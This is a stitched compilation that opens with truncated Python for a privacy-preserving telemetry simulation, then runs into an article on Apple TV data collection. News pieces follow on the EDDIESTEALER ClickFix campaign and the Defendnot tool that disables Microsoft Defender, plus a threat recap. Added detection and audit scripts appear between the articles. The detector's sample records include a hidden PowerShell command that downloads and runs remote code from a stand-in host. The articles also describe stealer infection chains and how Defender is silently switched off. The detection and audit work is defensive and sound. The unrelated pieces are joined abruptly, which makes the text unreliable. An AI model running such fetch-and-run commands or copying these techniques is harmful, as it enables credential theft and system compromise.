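
def aggregate(reports: list[int], epsilon: float) -> float:
    """Stage 3: unbiased estimate of the true population rate from noisy
    reports. With p = keep_probability(eps), E[report] = p*rate + (1-p)*(1-rate),
    so rate = (mean - (1-p)) / (2p - 1)."""
    p = keep_probability(epsilon)
    mean = sum(reports) / len(reports)
    return (mean - (1.0 - p)) / (2.0 * p - 1.0)

def deniability_ratio(epsilon: float) -> float:
    """Likelihood ratio P(report=1 | true=1) / P(report=1 | true=0) = e^eps:
    the per-device guarantee, independent of how many records the server holds."""
    p = keep_probability(epsilon)
    return p / (1.0 - p)

def simulate(n_devices: int, true_rate: float, epsilon: float, seed: int = 7) -> dict:
    """Run all three stages over a constructed fleet and return what the server
    saw and what it estimated."""
    rng = random.Random(seed)
    transport = []
    for i in range(n_devices):
        device = {"device_id": f"device-{i:05d}",            # never transmitted
                  "used_feature_x": 1 if rng.random() < true_rate else 0}
        transport.append({"ip": f"203.0.113.{i % 256}",      # dropped at ingestion
                          "contribution": build_contribution(device, epsilon, rng)})
    contributions = ingest(transport)
    reports = [c["report"] for c in contributions]
    return {"estimate": aggregate(reports, epsilon),
            "fields_seen": sorted(contributions[0].keys()),
            "n": len(reports)}

if __name__ == "__main__":
    result = simulate(n_devices=20000, true_rate=0.3, epsilon=math.log(3))
    print(result)  # estimate close to 0.3; fields_seen == ['metric', 'report']
```

    With epsilon = ln 3 each device tells the truth three times out of four, so any single report is deniable, while the estimator recovers the fleet-wide rate to within a few tenths of a percent at 20,000 devices.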
    Other types of data Apple may collect from Apple accounts include transaction information (Apple says this is "data about purchases of Apple products and services or transactions facilitated by Apple, including purchases on Apple platforms"), account information ("including email address, devices registered, account status, and age"), device information (including serial number and browser type), contact information (including physical address and phone number), and payment information (including bank details). None of that is surprising considering the type of data needed to make an Apple account work. Many Apple TV users can expect Apple to gather more data from their Apple account usage on other devices, such as iPhones or Macs.

    However, if you use the same Apple account across multiple devices, Apple recognizes that all the data it has collected from, for example, your iPhone activity, also applies to you as an Apple TV user. A potential workaround could be maintaining multiple Apple accounts. With an Apple account solely dedicated to your Apple TV box and Apple TV hardware and software tracking disabled as much as possible, Apple would have minimal data to ascribe to you as an Apple TV owner. You can also use your Apple TV box without an Apple account, but then you won't be able to use the Apple TV app, one of the device's key features.

    Data collection via the Apple TV app

    You can download third-party apps like Netflix and Hulu onto an Apple TV box, but most TV and movie watching on Apple TV boxes likely occurs via the Apple TV app. The app is necessary for watching content on the Apple TV+ streaming service, but it also drives usage by providing access to the libraries of many (but not all) popular streaming apps in one location. So understanding the Apple TV app’s privacy policy is critical to evaluating how private Apple TV activity truly is.

    As expected, some of the data the app gathers is necessary for the software to work. That includes, according to the app's privacy policy, "information about your purchases, downloads, activity in the Apple TV app, the content you watch, and where you watch it in the Apple TV app and in connected apps on any of your supported devices." That all makes sense for ensuring that the app remembers things like which episode of Severance you're on across devices.

    Apple collects other data, though, that isn't necessary for functionality. It says it gathers data on things like the "features you use (for example, Continue Watching or Library)," content pages you view, how you interact with notifications, and approximate location information (that Apple says doesn't identify users) to help improve the app. Additionally, Apple tracks the terms you search for within the app, per its policy:

        We use Apple TV search data to improve models that power Apple TV. For example, aggregate Apple TV search queries are used to fine-tune the Apple TV search model.

    This data usage is less intrusive than that of other streaming devices, which might track your activity and then sell that data to third-party advertisers. But some people may be hesitant about having any of their activities tracked to benefit a multi-trillion-dollar conglomerate.

    Data collected from the Apple TV app used for ads

    By default, the Apple TV app also tracks "what you watch, your purchases, subscriptions, downloads, browsing, and other activities in the Apple TV app" to make personalized content recommendations. Content recommendations aren't ads in the traditional sense but instead provide a way for Apple to push you toward products by analyzing data it has on you. You can disable the Apple TV app's personalized recommendations, but it's a little harder than you might expect since you can't do it through the app. Instead, you need to go to the Apple TV settings and then select Apps > TV > Use Play History > Off.

    The most privacy-conscious users may wish that personalized recommendations were off by default. Darío Maestro, senior legal fellow at the nonprofit Surveillance Technology Oversight Project (STOP), noted to Ars that even though Apple TV users can opt out of personalized content recommendations, "many will not realize they can."

    Apple can also use data it gathers on you from the Apple TV app to serve traditional ads. If you allow your Apple TV box to track your location, the Apple TV app can also track your location. That data can "be used to serve geographically relevant ads," according to the Apple TV app privacy policy. Location tracking, however, is off by default on Apple TV boxes.

    Apple's tvOS doesn't have integrated ads. For comparison, some TV OSes, like Roku OS and LG's webOS, show ads on the OS's home screen and/or when showing screensavers. But data gathered from the Apple TV app can still help Apple's advertising efforts. This can happen if you allow personalized ads in other Apple apps serving targeted ads, such as Apple News, the App Store, or Stocks. In such cases, Apple may apply data gathered from the Apple TV app, "including information about the movies and TV shows you purchase from Apple, to serve ads in those apps that are more relevant to you," the Apple TV app privacy policy says.

    Apple also provides third-party advertisers and strategic partners with "non-personal data" gathered from the Apple TV app:

        We provide some non-personal data to our advertisers and strategic partners that work with Apple to provide our products and services, help Apple market to customers, and sell ads on Apple’s behalf to display on the App Store and Apple News and Stocks.

    Apple also shares non-personal data from the Apple TV with third parties, such as content owners, so they can pay royalties, gauge how much people are watching their shows or movies, "and improve their associated products and services," Apple says. Apple's policy notes:

        For example, we may share non-personal data about your transactions, viewing activity, and region, as well as aggregated user demographics[,] such as age group and gender (which may be inferred from information such as your name and salutation in your Apple Account), to Apple TV strategic partners, such as content owners, so that they can measure the performance of their creative work [and] meet royalty and accounting requirements.

    When reached for comment, an Apple spokesperson told Ars that Apple TV users can clear their play history from the app.

    All that said, the Apple TV app still shares far less data with third parties than other streaming apps. Netflix, for example, says it discloses some personal information to advertising companies "in order to select Advertisements shown on Netflix, to facilitate interaction with Advertisements, and to measure and improve effectiveness of Advertisements." Warner Bros. Discovery says it discloses information about Max viewers "with advertisers, ad agencies, ad networks and platforms, and other companies to provide advertising to you based on your interests." And Disney+ users have Nielsen tracking on by default.

    What if you use Siri?

    You can easily deactivate Siri when setting up an Apple TV. But those who opt to keep the voice assistant and the ability to control Apple TV with their voice take somewhat of a privacy hit. According to the privacy policy accessible in Apple TV boxes' settings, Apple boxes automatically send all Siri requests to Apple's servers. If you opt into using Siri data to "Improve Siri and Dictation," Apple will store your audio data. If you opt out, audio data won't be stored, but per the policy:

        In all cases, transcripts of your interactions will be sent to Apple to process your requests and may be stored by Apple.

    Apple TV boxes also send audio and transcriptions of dictation input to Apple servers for processing. Apple says it doesn't store the audio but may store transcriptions of the audio. If you opt to "Improve Siri and Dictation," Apple says your history of voice requests isn't tied to your Apple account or email. But Apple is vague about how long it may store data related to voice input performed with the Apple TV if you choose this option. The policy states:

        Your request history, which includes transcripts and any related request data, is associated with a random identifier for up to six months and is not tied to your Apple Account or email address. After six months, your request history is disassociated from the random identifier and may be retained for up to two years. Apple may use this data to develop and improve Siri, Dictation, Search, and limited other language processing functionality in Apple products ... Apple may also review a subset of the transcripts of your interactions and this ... may be kept beyond two years for the ongoing improvements of products and services.

    Apple promises not to use Siri and voice data to build marketing profiles or sell them to third parties, but it hasn't always adhered to that commitment. In January, Apple agreed to pay $95 million to settle a class-action lawsuit accusing Siri of recording private conversations and sharing them with third parties for targeted ads. In 2019, contractors reported hearing private conversations and recorded sex via Siri-gathered audio. Outside of Apple, we've seen voice request data used questionably, including in criminal trials and by corporate employees. Siri and dictation data also represent additional ways a person's Apple TV usage might be unexpectedly analyzed to fuel Apple's business.

    Automatic content recognition

    Apple TVs aren't preloaded with automatic content recognition (ACR), an Apple spokesperson confirmed to Ars, another plus for privacy advocates. But ACR is software, so Apple could technically add it to Apple TV boxes via a software update at some point.

    Sherman Li, the founder of Enswers, the company that first put ACR in Samsung TVs, confirmed to Ars that it's technically possible for Apple to add ACR to already-purchased Apple boxes. Years ago, Enswers retroactively added ACR to other types of streaming hardware, including Samsung and LG smart TVs. (Enswers was acquired by Gracenote, which Nielsen now owns.) In general, though, there are challenges to adding ACR to hardware that people already own, Li explained:

        Everyone believes, in theory, you can add ACR anywhere you want at any time because it's software, but because of the way [hardware is] architected... the interplay between the chipsets, like the SoCs, and the firmware is different in a lot of situations.

    Li pointed to numerous variables that could prevent ACR from being retroactively added to any type of streaming hardware, "including access to video frame buffers, audio streams, networking connectivity, security protocols, OSes, and app interface communication layers, especially at different levels of the stack in these devices, depending on the implementation."

    Due to the complexity of Apple TV boxes, Li suspects it would be difficult to add ACR to already-purchased Apple TVs. It would likely be simpler for Apple to release a new box with ACR if it ever decided to go down that route. If Apple were to add ACR to old or new Apple TV boxes, the devices would be far less private, and the move would be highly unpopular and eliminate one of the Apple TV's biggest draws.

    However, Apple reportedly has a growing interest in advertising to streaming subscribers. The Apple TV+ streaming service doesn't currently show commercials, but the company is rumored to be exploring a potential ad tier. The suspicions stem from a reported meeting between Apple and the United Kingdom's ratings body, Barb, to discuss how it might track ads on Apple TV+, according to a July report from The Telegraph. Since 2023, Apple has also hired several prominent names in advertising, including a former head of advertising at NBCUniversal and a new head of video ad sales. Further, Apple TV+ is one of the few streaming services to remain ad-free, and it's reported to be losing Apple $1 billion per year since its launch.

    One day soon, Apple may have much more reason to care about advertising in streaming and being able to track the activities of people who use its streaming offerings. That has implications for Apple TV box users. "The more Apple creeps into the targeted ads space, the less I’ll trust them to uphold their privacy promises. You can imagine Apple TV being a natural progression for selling ads," PIRG's Cross said.

    Somewhat ironically, Apple has marketed its approach to privacy as a positive for advertisers. "Apple’s commitment to privacy and personal relevancy builds trust amongst readers, driving a willingness to engage with content and ads alike," Apple's advertising guide for buying ads on Apple News and Stocks reads.

    The most private streaming gadget

    It remains technologically possible for Apple to introduce intrusive tracking or ads to Apple TV boxes, but for now, the streaming devices are more private than the vast majority of alternatives, save for dumb TVs (which are incredibly hard to find these days). And if Apple follows its own policies, much of the data it gathers should be kept in-house. However, those with strong privacy concerns should be aware that Apple does track certain tvOS activities, especially those that happen through Apple accounts, voice interaction, or the Apple TV app. And while most of Apple's streaming hardware and software settings prioritize privacy by default, some advocates believe there's room for improvement. For example, STOP's Maestro said:

        Unlike in the [European Union], where the upcoming Data Act will set clearer rules on transfers of data generated by smart devices, the US has no real legislation governing what happens with your data once it reaches Apple's servers. Users are left with little way to verify those privacy promises.

    Maestro suggested that Apple could address these concerns by making it easier for people to conduct security research on smart device software. "Allowing the development of alternative or modified software that can evaluate privacy settings could also increase user trust and better uphold Apple's public commitment to privacy," Maestro said.

    There are ways to limit the amount of data that advertisers can get from your Apple TV. But if you use the Apple TV app, Apple can use your activity to help make business decisions—and therefore money. As you might expect from a device that connects to the Internet and lets you stream shows and movies, Apple TV boxes aren't totally incapable of tracking you. But they're still the best recommendation for streaming users seeking hardware with more privacy and fewer ads.

    Scharon Harding, Senior Technology Reporter. Scharon is a Senior Technology Reporter at Ars Technica writing news, reviews, and analysis on consumer gadgets and services. She's been reporting on technology for over 10 years, with bylines at Tom’s Hardware, Channelnomics, and CRN UK.
  • New EDDIESTEALER Malware Bypasses Chrome's App-Bound Encryption to Steal Browser Data

    May 30, 2025 | Ravie Lakshmanan | Browser Security / Malware

    A new malware campaign is distributing a novel Rust-based information stealer dubbed EDDIESTEALER using the popular ClickFix social engineering tactic initiated via fake CAPTCHA verification pages.
    "This campaign leverages deceptive CAPTCHA verification pages that trick users into executing a malicious PowerShell script, which ultimately deploys the infostealer, harvesting sensitive data such as credentials, browser information, and cryptocurrency wallet details," Elastic Security Labs researcher Jia Yu Chan said in an analysis.
    The attack chains begin with threat actors compromising legitimate websites with malicious JavaScript payloads that serve bogus CAPTCHA check pages, which prompt site visitors to "prove you are not [a] robot" by following a three-step process, a prevalent tactic called ClickFix.
    This involves instructing the potential victim to open the Windows Run dialog prompt, paste an already copied command into the "verification window" (i.e., the Run dialog), and press enter. This effectively causes the obfuscated PowerShell command to be executed, resulting in the retrieval of a next-stage payload from an external server ("llll[.]fit").
    The JavaScript payload ("gverify.js") is subsequently saved to the victim's Downloads folder and executed using cscript in a hidden window. The main goal of the intermediate script is to fetch the EDDIESTEALER binary from the same remote server and store it in the Downloads folder with a pseudorandom 12-character file name.
    Written in Rust, EDDIESTEALER is a commodity stealer malware that can gather system metadata, receive tasks from a command-and-control (C2) server, and siphon data of interest from the infected host. The exfiltration targets include cryptocurrency wallets, web browsers, password managers, FTP clients, and messaging apps.
    "These targets are subject to change as they are configurable by the C2 operator," Elastic explained. "EDDIESTEALER then reads the targeted files using standard kernel32.dll functions like CreateFileW, GetFileSizeEx, ReadFile, and CloseHandle."

    The collected host information is encrypted and transmitted to the C2 server in a separate HTTP POST request after the completion of each task.
    Besides incorporating string encryption, the malware employs a custom WinAPI lookup mechanism for resolving API calls and creates a mutex to ensure that only one version is running at any given time. It also incorporates checks to determine if it's being executed in a sandboxed environment, and if so, deletes itself from disk.
    "Based on a similar self-deletion technique observed in Latrodectus, EDDIESTEALER is capable of deleting itself through NTFS Alternate Data Streams renaming, to bypass file locks," Elastic noted.
    Another noteworthy feature built into the stealer is its ability to bypass Chromium's app-bound encryption to gain access to unencrypted sensitive data, such as cookies. This is accomplished by including a Rust implementation of ChromeKatz, an open-source tool that can dump cookies and credentials from the memory of Chromium-based browsers.
    The Rust version of ChromeKatz also incorporates changes to handle scenarios where the targeted Chromium browser is not running. In such cases, it spawns a new browser instance using the command-line arguments "--window-position=-3000,-3000 https://google.com," effectively positioning the new window far off-screen and making it invisible to the user.

    The point of opening the browser is to let the malware read the memory of Chrome's network service child process, identified by the "-utility-sub-type=network.mojom.NetworkService" flag, and ultimately extract the credentials.
    Elastic said it also identified updated versions of the malware with features to harvest running processes, GPU information, number of CPU cores, CPU name, and CPU vendor. In addition, the new variants tweak the C2 communication pattern by preemptively sending the host information to the server before receiving the task configuration.
    That's not all. The encryption key used for client-to-server communication is hard-coded into the binary, as opposed to retrieving it dynamically from the server. Furthermore, the stealer has been found to launch a new Chrome process with the --remote-debugging-port=<port_num> flag to enable DevTools Protocol over a local WebSocket interface so as to interact with the browser in a headless manner, without requiring any user interaction.
    "This adoption of Rust in malware development reflects a growing trend among threat actors seeking to leverage modern language features for enhanced stealth, stability, and resilience against traditional analysis workflows and threat detection engines," the company said.
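One way to turn the chain described above into detection logic, as an added example that is not Elastic's or the page's own code: it checks constructed Sysmon-style process-creation records for the Run-dialog PowerShell launch, the script host and 12-character binary running from Downloads, and Chrome started off-screen or with remote debugging by a non-Chrome parent. The sample records, the `example.invalid` URL and the hidden/encoded PowerShell switches are constructed assumptions; Chrome's own child processes (such as the network service) are deliberately left unflagged.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One Sysmon-style process-creation record (constructed for this example)."""
    image: str          # full path of the new process
    cmdline: str        # its command line
    parent_image: str   # full path of the parent process


# The Windows Run dialog hands commands to explorer.exe, so the pasted ClickFix
# one-liner shows up as PowerShell with explorer.exe as parent. The article only
# says the command is "obfuscated"; hidden-window/encoded switches are an assumption.
PS_OBFUSCATION = re.compile(
    r"-(e|ec|enc|encodedcommand|w\s+hidden|windowstyle\s+hidden)\b", re.I)
DOWNLOADS = re.compile(r"\\Downloads\\", re.I)
# Pseudorandom 12-character file name reported for the dropped stealer binary.
RANDOM12_EXE = re.compile(r"\\Downloads\\[A-Za-z0-9]{12}\.exe$", re.I)
# Off-screen placement (negative coordinates) used when the stealer has to start
# its own Chrome instance, and the DevTools flag seen in the newer variants.
OFFSCREEN = re.compile(r"--window-position=-\d+,-\d+", re.I)
REMOTE_DEBUG = re.compile(r"--remote-debugging-port=\d+", re.I)
CHROMIUM = re.compile(r"\\(chrome|msedge|brave|chromium)\.exe$", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(ev: ProcEvent) -> list[str]:
    """Return the names of every indicator the record matches (empty = benign)."""
    hits = []
    img, parent = basename(ev.image), basename(ev.parent_image)
    # Stage 1: PowerShell launched from the Run dialog with hidden/encoded switches.
    if (img in ("powershell.exe", "pwsh.exe") and parent == "explorer.exe"
            and PS_OBFUSCATION.search(ev.cmdline)):
        hits.append("clickfix_run_dialog_powershell")
    # Stage 2: a script host running a .js dropped into Downloads.
    if (img in ("cscript.exe", "wscript.exe") and DOWNLOADS.search(ev.cmdline)
            and re.search(r"\.js\b", ev.cmdline, re.I)):
        hits.append("script_host_js_from_downloads")
    # Stage 3: the 12-character pseudorandom binary executing from Downloads.
    if RANDOM12_EXE.search(ev.image):
        hits.append("random12_exe_from_downloads")
    # Stage 4: Chromium started by a non-Chromium parent, either off-screen or
    # with remote debugging. Chrome's own children (e.g. the network service
    # utility process) have chrome.exe as parent and are not flagged here.
    if CHROMIUM.search(ev.image) and not CHROMIUM.search(ev.parent_image):
        if OFFSCREEN.search(ev.cmdline):
            hits.append("chromium_offscreen_window")
        if REMOTE_DEBUG.search(ev.cmdline):
            hits.append("chromium_remote_debugging")
    return hits


def scan(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map each event index that fired at least one indicator to its hits."""
    return {i: h for i, ev in enumerate(events) if (h := detect(ev))}


# Constructed records mirroring the chain described above (not real telemetry).
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_EXPLORER = r"C:\Windows\explorer.exe"
_CSCRIPT = r"C:\Windows\System32\cscript.exe"
_DROPPED = r"C:\Users\alice\Downloads\aB3kT9xQ2mLp.exe"
_CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
SAMPLE_EVENTS = [
    ProcEvent(_PS, 'powershell -w hidden -ep bypass -c "iex (iwr https://example.invalid/verify)"', _EXPLORER),
    ProcEvent(_CSCRIPT, r'cscript.exe "C:\Users\alice\Downloads\gverify.js"', _PS),
    ProcEvent(_DROPPED, _DROPPED, _CSCRIPT),
    ProcEvent(_CHROME, '"chrome.exe" --window-position=-3000,-3000 https://google.com', _DROPPED),
    ProcEvent(_CHROME, '"chrome.exe" --remote-debugging-port=9222', _DROPPED),
    # benign: Chrome's own network-service child, spawned by chrome.exe itself
    ProcEvent(_CHROME, '"chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService', _CHROME),
    # benign: a user opening PowerShell normally from the Start menu
    ProcEvent(_PS, "powershell.exe", _EXPLORER),
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(hits)}")
```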
    The disclosure comes as c/side revealed details of a ClickFix campaign that targets multiple platforms, such as Apple macOS, Android, and iOS, using techniques like browser-based redirections, fake UI prompts, and drive-by download techniques.
    The attack chain starts with an obfuscated JavaScript hosted on a website that, when visited from macOS, initiates a series of redirections to a page that guides victims to launch Terminal and run a shell script, which leads to the download of a stealer malware flagged on VirusTotal as the Atomic macOS Stealer (AMOS).
    However, the same campaign has been configured to initiate a drive-by download scheme when visiting the web page from an Android, iOS, or Windows device, leading to the deployment of another trojan malware.

    The disclosures coincide with the emergence of new stealer malware families like Katz Stealer and AppleProcessHub Stealer, targeting Windows and macOS respectively, which are capable of harvesting a wide range of information from infected hosts, according to Nextron and Kandji.
    Katz Stealer, like EDDIESTEALER, is engineered to circumvent Chrome's app-bound encryption, but in a different way: it employs DLL injection to obtain the encryption key without administrator privileges and uses it to decrypt encrypted cookies and passwords from Chromium-based browsers.

    "Attackers conceal malicious JavaScript in gzip files, which, when opened, trigger the download of a PowerShell script," Nextron said. "This script retrieves a .NET-based loader payload, which injects the stealer into a legitimate process. Once active, it exfiltrates stolen data to the command and control server."
    AppleProcessHub Stealer, on the other hand, is designed to exfiltrate user files including bash history, zsh history, GitHub configurations, SSH information, and iCloud Keychain.
    Attack sequences distributing the malware entail the use of a Mach-O binary that downloads a second-stage bash stealer script from the server "appleprocesshub[.]com" and runs it, the results of which are then exfiltrated back to the C2 server. Details of the malware were first shared by the MalwareHunterTeam on May 15, 2025, and by MacPaw's Moonlock Lab last week.
    "This is an example of a Mach-O written in Objective-C which communicates with a command and control server to execute scripts," Kandji researcher Christopher Lopez said.

    Source: THEHACKERNEWS.COM
  • Windows PCs at risk as new tool disarms built-in security

    Published May 29, 2025 10:00am EDT

    All modern Windows PCs come with Microsoft Defender built in. For the unaware, this tool is Windows’ native antivirus. Over time, it has matured into a reliable security tool capable of blocking a wide range of threats. However, a tool called Defendnot can shut down Microsoft Defender completely, without exploiting a bug or using malware. It simply convinces Windows that another antivirus is already running.

    The implications are serious. This tool does not break into the system or use advanced code injection. It uses Windows features the way they were designed to be used. And that makes the problem harder to detect and harder to fix.

    The tool works by pretending to be an antivirus

    Windows is built to avoid running multiple antivirus products at once. When a third-party antivirus registers itself, Windows disables Microsoft Defender to prevent conflicts. Defendnot exploits this system using an undocumented API that security software uses to communicate with the Windows Security Center.

    The tool registers a fake antivirus that appears legitimate to the system. It uses a dummy DLL and injects it into Task Manager, a trusted Windows process. By operating inside this signed process, Defendnot avoids signature checks and permission blocks. Once the fake antivirus is registered, Windows disables Microsoft Defender without warning or confirmation.

    No security alert is shown to the user. No visible changes are made to indicate that the system is unprotected. Unless someone checks manually, the machine remains open to attacks with no real-time protection running.

    The tool also includes options to set a custom antivirus name, enable logging and configure automatic startup. It achieves persistence by creating a scheduled task that runs whenever the user logs in.

    From GitHub takedown to a fresh build

    Defendnot is based on an earlier project called No-Defender. That project used code from an actual antivirus product to fake registration. It gained attention quickly and was removed after a copyright complaint from the vendor whose code had been reused. The developer took the project down and walked away from it.

    With Defendnot, the creator rebuilt the core features using original code. This version avoids copyright issues and uses a new method to achieve the same effect. It does not rely on another antivirus or third-party binaries. It was written from scratch to demonstrate how simple it is to manipulate Windows security from inside the system.

    Microsoft Defender currently flags the tool as a threat. It detects and quarantines it under the name Win32/Sabsik.FL.!ml. However, the fact that it works at all points to a weakness in how Windows handles antivirus registration and trust.

    6 ways to protect yourself from malicious programs

    While Defendnot is a research project, there’s a chance that similar tools are already out there and could be used to compromise your PC. Here are a few tips to help you stay safe:

    1. Use strong antivirus software: Even with regular updates, Windows systems can be left exposed by tools like Defendnot that silently disable built-in defenses. A strong third-party antivirus with real-time protection and frequent updates provides essential backup security. Look for solutions with real-time protection and frequent updates to tackle emerging threats.
    2. Limit exposure: Many exploits rely on user interaction, such as clicking a shady link, downloading a compromised file or mounting an untrusted virtual disk. Stick to reputable websites, avoid opening unsolicited email attachments and use a browser with built-in security features.
    3. Avoid running unexpected commands: Never paste or run commands you don’t understand or that were copied from random websites. Attackers often trick users into unknowingly running malware this way.
    4. Keep your software updated: Regularly update your operating system, browsers and all software applications. Updates often include patches for security vulnerabilities that malware can exploit.
    5. Use two-factor authentication: Enable 2FA on all your accounts. This adds an extra layer of security by requiring a second form of verification, making it harder for attackers to gain access even if they have your password.
    6. Invest in personal data removal services: Even with strong device security, your personal information may still be exposed online through data brokers and people-finder sites. These services collect and publish details like your name, address and phone number, making you an easier target for identity theft or phishing. Automated data removal services track down these sites and submit removal requests on your behalf, helping to reduce your digital footprint and increase your online anonymity. While they can't erase every trace of your information, they make it significantly harder for attackers to find and exploit your personal data, which saves you time and reduces unwanted spam in the process. While no service promises to remove all your data from the internet, having a removal service is great if you want to constantly monitor and automate the process of removing your information from hundreds of sites continuously over a longer period of time.

    Kurt’s key takeaway

    Defendnot points to a bigger issue with how Windows handles security. It takes a feature meant to prevent software conflicts and turns it into a way to completely disable protection. The system assumes any registered antivirus is legitimate, so if attackers can fake that, they get in without much resistance.

    We often think of security as blocking the bad and trusting the good. But this case shows what happens when that trust is misplaced. Defendnot doesn’t sneak past Windows defenses. It walks right in using valid credentials. The solution isn’t just more patches or stronger malware signatures. What we need is a smarter way for systems to tell what is actually safe.

    Do you think companies like Microsoft need to rethink how Windows handles antivirus registration and trust, given that tools like Defendnot can so easily disable built-in protections without using malware or exploiting a bug? Let us know by writing us at Cyberguy.com/Contact. For more of my tech tips and security alerts, subscribe to my free CyberGuy Report Newsletter by heading to Cyberguy.com/Newsletter.

    Copyright 2025 CyberGuy.com. All rights reserved. Kurt "CyberGuy" Knutsson is an award-winning tech journalist who has a deep love of technology, gear and gadgets that make life better with his contributions for Fox News & FOX Business beginning mornings on "FOX & Friends."
    WWW.FOXNEWS.COM
    Windows PCs at risk as new tool disarms built-in security
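The manual check the article refers to, as an added example (this is not code from the article or from the Defendnot project): a PowerShell audit that lists what the Windows Security Center believes is registered, what Defender reports about itself, and which scheduled tasks fire at logon. The function names are mine, and the "missing or unsigned product binary" heuristic is an assumption about how a spoofed registration differs from a real vendor's, not a documented Defendnot indicator.

```powershell
# Added example, not part of the article or of Defendnot: audit what the
# Windows Security Center (WSC) believes about antivirus coverage and compare
# it with Defender's own status. Run from an elevated PowerShell prompt on
# Windows 10/11. Only built-in modules (Defender, ScheduledTasks) are used.

function Get-RegisteredAntivirus {
    # WSC lists registered AV products in the root/SecurityCenter2 WMI
    # namespace. A spoofed registration appears here like any real product,
    # but a genuine vendor's pathToSignedProductExe is an existing,
    # Authenticode-signed binary. Defender's own entry uses a
    # windowsdefender:// URI rather than a file path.
    Get-CimInstance -Namespace 'root/SecurityCenter2' -ClassName 'AntiVirusProduct' |
        ForEach-Object {
            $exe       = [string]$_.pathToSignedProductExe
            $isBuiltIn = $exe -like 'windowsdefender://*'
            $exists    = (-not $isBuiltIn) -and ($exe -ne '') -and (Test-Path -LiteralPath $exe)
            $sig       = $null
            if ($exists) { $sig = Get-AuthenticodeSignature -LiteralPath $exe }
            [pscustomobject]@{
                DisplayName  = $_.displayName
                ProductState = '0x{0:X}' -f $_.productState
                ProductExe   = $exe
                IsBuiltIn    = $isBuiltIn
                ExeExists    = $exists
                SigStatus    = $(if ($sig) { $sig.Status.ToString() } else { 'n/a' })
                Signer       = $(if ($sig -and $sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '' })
            }
        }
}

function Get-DefenderCoverage {
    # Defender's own view of itself. When WSC has accepted another AV, Defender
    # stands down: AntivirusEnabled and RealTimeProtectionEnabled go False
    # with no user-facing alert, which is exactly the gap the article describes.
    $mp = Get-MpComputerStatus
    [pscustomobject]@{
        AMServiceEnabled          = $mp.AMServiceEnabled
        AntivirusEnabled          = $mp.AntivirusEnabled
        RealTimeProtectionEnabled = $mp.RealTimeProtectionEnabled
        IsTamperProtected         = $mp.IsTamperProtected
    }
}

function Get-LogonTasks {
    # Defendnot persists with a scheduled task that fires at logon. List every
    # task with a logon trigger and the program it runs so odd entries stand out.
    foreach ($task in Get-ScheduledTask) {
        $logon = @($task.Triggers | Where-Object { $_ -and $_.CimClass.CimClassName -eq 'MSFT_TaskLogonTrigger' })
        if ($logon.Count -eq 0) { continue }
        foreach ($action in $task.Actions) {
            [pscustomobject]@{
                TaskPath  = $task.TaskPath
                TaskName  = $task.TaskName
                Execute   = $action.Execute
                Arguments = $action.Arguments
            }
        }
    }
}

function Invoke-WscAudit {
    $products = @(Get-RegisteredAntivirus)
    $defender = Get-DefenderCoverage

    Write-Host '== Antivirus products registered with Windows Security Center =='
    $products | Format-Table DisplayName, ProductState, IsBuiltIn, ExeExists, SigStatus, Signer -AutoSize | Out-String | Write-Host
    Write-Host '== Defender status =='
    $defender | Format-List | Out-String | Write-Host

    # Heuristic (assumption, not a documented indicator): a non-Microsoft
    # registration whose binary is missing or unsigned while Defender reports
    # real-time protection off matches the Defendnot pattern.
    $suspect = @($products | Where-Object { -not $_.IsBuiltIn -and (-not $_.ExeExists -or $_.SigStatus -ne 'Valid') })
    if ($suspect.Count -gt 0 -and -not $defender.RealTimeProtectionEnabled) {
        Write-Warning ('Defender real-time protection is OFF and WSC trusts an unverifiable product: ' +
                       (($suspect | ForEach-Object DisplayName) -join ', '))
    }
    Write-Host '== Logon-triggered scheduled tasks (look for the persistence task) =='
    Get-LogonTasks | Format-Table -AutoSize | Out-String | Write-Host
}

Invoke-WscAudit
```

A real third-party product will show an existing, validly signed binary and a recognisable signer; Defender's entry is expected to show IsBuiltIn true. Treat the warning as a prompt to look, not a verdict: the productState field is left as a raw hex value because its bit layout is not documented by Microsoft.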
  • Weekly Recap: APT Campaigns, Browser Hijacks, AI Malware, Cloud Breaches and Critical CVEs

    Cyber threats don't show up one at a time anymore. They're layered, planned, and often stay hidden until it's too late.
    For cybersecurity teams, the key isn't just reacting to alerts—it's spotting early signs of trouble before they become real threats. This update is designed to deliver clear, accurate insights based on real patterns and changes we can verify. With today's complex systems, we need focused analysis—not noise.
    What you'll see here isn't just a list of incidents, but a clear look at where control is being gained, lost, or quietly tested.
    Threat of the Week
    Lumma Stealer, DanaBot Operations Disrupted — A coalition of private sector companies and law enforcement agencies has taken down the infrastructure associated with Lumma Stealer and DanaBot. Charges have also been unsealed against 16 individuals for their alleged involvement in the development and deployment of DanaBot. The malware is equipped to siphon data from victim computers, hijack banking sessions, and steal device information. More unusually, DanaBot has also been used in hacking campaigns that appear to be linked to Russian state interests, which makes it a particularly clear example of commodity malware being repurposed by Russian state hackers for their own goals. In tandem, about 2,300 domains that acted as the command-and-control (C2) backbone for the Lumma information stealer have been seized, 300 servers have been taken down, and 650 domains used to launch ransomware attacks have been neutralized. The actions against international cybercrime in the past few days constitute the latest phase of Operation Endgame.


    Top News

    Threat Actors Use TikTok Videos to Distribute Stealers — While ClickFix has become a popular social engineering tactic to deliver malware, threat actors have now been observed using AI-generated videos uploaded to TikTok to deceive users into running malicious commands on their systems, deploying stealers like Vidar and StealC under the guise of activating pirated versions of Windows, Microsoft Office, CapCut, and Spotify. "This campaign highlights how attackers are ready to weaponize whichever social media platforms are currently popular to distribute malware," Trend Micro said.
    APT28 Hackers Target Western Logistics and Tech Firms — Cybersecurity and intelligence agencies from Australia, Europe, and the United States issued a joint alert warning of a campaign by the Russian state-sponsored threat actor APT28 that has targeted Western logistics entities and technology companies since 2022. "This cyber espionage-oriented campaign targeting logistics entities and technology companies uses a mix of previously disclosed TTPs and is likely connected to these actors' wide scale targeting of IP cameras in Ukraine and bordering NATO nations," the agencies said. The attacks are designed to steal sensitive information and maintain long-term persistence on compromised hosts.
